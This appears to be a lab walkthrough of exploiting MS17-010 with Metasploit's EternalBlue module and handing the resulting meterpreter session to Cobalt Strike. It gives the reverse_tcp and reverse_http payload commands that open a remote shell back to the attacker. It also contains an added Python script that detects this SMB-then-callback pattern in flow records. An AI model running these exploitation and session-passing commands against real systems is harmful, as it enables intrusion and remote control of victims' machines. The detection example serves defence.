MSF and CobaltStrike linkage


0x00 Environment Introduction
Attacker: (kali)

Victim machine:


Tools: nmap, metasploit, cobaltstrike

0x01 attack preparation
First, deploy the victim host and configure the network adapters so that the attacker and the victim can reach each other.

Next, deploy a web application service on the victim so that it looks like a real application server.

0x02 pre-attack stage
Information gathering with nmap reveals open ports 445 and 3389 and the operating system version.

nmap -A

The scan showed port 445 open, so the host was checked for the MS17-010 vulnerability, which was confirmed to be present.


First, open msf and exploit the vulnerability.

1. Search for the exploit module

search ms17_010

2. Exploit the vulnerability

use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/reverse_tcp

Obtain a session

Enter the meterpreter session.

Next, hand the session over to Cobalt Strike

If the built-in functions are too limited, you can also link MSF with Cobalt Strike.

Start Cobalt Strike.

At this point there is an MSF session of type meterpreter, and its session id is 1.

Create a new listener in Cobalt Strike and configure it as follows:

Then set the following in MSF:

use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set DisablePayloadHandler true
set lhost
set lport 12388
set session 1


In this way, the Meterpreter session bounced from MSF appears in Cobalt Strike.

Finally, the post-exploitation modules integrated in Cobalt Strike can be used for further testing.

Note: only Meterpreter-type sessions can be passed to Cobalt Strike.
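The attack chain above leaves a recognizable network pattern on the victim: an inbound SMB connection on port 445 (the MS17-010 exploitation step), followed shortly by an outbound HTTP-style callback to an unusual port (here the reverse_http payload calling back to the Cobalt Strike listener on 12388). The following Python script is an added defender-side example, not part of the original post, that correlates these two events over a few constructed flow records. The flow format, the addresses, the ten-minute window and the list of "expected" web ports are assumptions for the example.

```python
"""Correlate inbound SMB (445) connections with a later outbound connection
to a non-standard port from the same host, which is the sequence the
walkthrough above produces (MS17-010 over 445, then a reverse_http
callback to port 12388).
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample flow records (not from the original page).
# Fields: timestamp, source, destination, destination port, and direction
# as seen from the monitored host 192.0.2.20 (hypothetical victim address).
SAMPLE_FLOWS = """\
2024-05-01T10:00:01 192.0.2.10 192.0.2.20 445 inbound
2024-05-01T10:00:05 192.0.2.10 192.0.2.20 3389 inbound
2024-05-01T10:00:40 192.0.2.20 192.0.2.10 12388 outbound
2024-05-01T10:05:00 192.0.2.30 192.0.2.20 445 inbound
2024-05-01T12:00:00 192.0.2.20 198.51.100.5 443 outbound
"""

# Ports on which an outbound HTTP-style connection is expected; anything
# else following an inbound SMB connection is treated as suspicious.
# Assumed list for this example.
EXPECTED_WEB_PORTS = {80, 443, 8080, 8443}
# How long after the inbound SMB connection a callback still counts as related.
CALLBACK_WINDOW = timedelta(minutes=10)


def parse_flows(text):
    """Parse the whitespace-separated flow format above into dicts."""
    flows = []
    for line in text.strip().splitlines():
        ts, src, dst, dport, direction = line.split()
        flows.append({
            "ts": datetime.fromisoformat(ts),
            "src": src,
            "dst": dst,
            "dport": int(dport),
            "direction": direction,
        })
    return flows


def find_smb_then_callback(flows, window=CALLBACK_WINDOW):
    """Return one alert per outbound connection to a non-standard port that
    follows, within `window`, an inbound SMB connection to the same host.

    Each alert records the victim, the SMB source, the callback destination
    and port, and the delay between the two events in seconds.
    """
    # victim host -> list of (time, remote source) for inbound SMB connections
    smb_hits = defaultdict(list)
    for f in flows:
        if f["direction"] == "inbound" and f["dport"] == 445:
            smb_hits[f["dst"]].append((f["ts"], f["src"]))

    alerts = []
    for f in flows:
        if f["direction"] != "outbound" or f["dport"] in EXPECTED_WEB_PORTS:
            continue
        for smb_ts, smb_src in smb_hits.get(f["src"], []):
            if smb_ts <= f["ts"] <= smb_ts + window:
                alerts.append({
                    "victim": f["src"],
                    "smb_source": smb_src,
                    "callback_dst": f["dst"],
                    "callback_port": f["dport"],
                    "delay_seconds": int((f["ts"] - smb_ts).total_seconds()),
                })
                break  # one alert per outbound flow is enough
    return alerts


if __name__ == "__main__":
    for alert in find_smb_then_callback(parse_flows(SAMPLE_FLOWS)):
        print(alert)
```

On the sample data only the 12388 callback 39 seconds after the SMB connection is reported; the later inbound 445 connection with no follow-up and the outbound 443 connection hours later are ignored. In practice the same logic applies to firewall or NetFlow exports, and blocking inbound 445 from untrusted networks removes the first step entirely.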

0x03 Summary
How much information is gathered during testing determines which penetration paths are available; only by correlating and reusing the collected information can the results of a penetration test be amplified effectively.
